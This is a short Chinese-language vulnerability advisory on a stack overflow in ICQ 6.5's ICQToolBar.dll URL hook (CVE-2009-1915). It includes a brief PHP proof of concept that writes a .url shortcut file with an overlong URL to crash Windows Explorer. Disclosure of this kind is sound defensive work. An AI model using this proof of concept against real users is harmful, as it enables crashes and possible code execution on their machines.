受影响系统:
AOL ICQ 6.5
描述:
BUGTRAQ ID: 35150
CVE(CAN) ID: CVE-2009-1915
ICQ是一款流行的即时通讯聊天工具。
ICQ的URL搜索钩子(ICQToolBar.dll)中存在栈溢出漏洞。如果用户受骗跟随了包含有超长URL参数的Internet快捷方式.URL文件的话,就可以触发这个溢出,导致资源管理器崩溃。
<*来源:pyrokinesis (pyro@nospam.it)
链接:http://www.milw0rm.com/exploits/8832
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
/*
$____x = "[InternetShortcut]\x0d\x0a".
"URL=".str_repeat("\x61",2184);
file_put_contents("9sg_poc.url",$____x);
?>
建议:
厂商补丁:
AOL
—
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。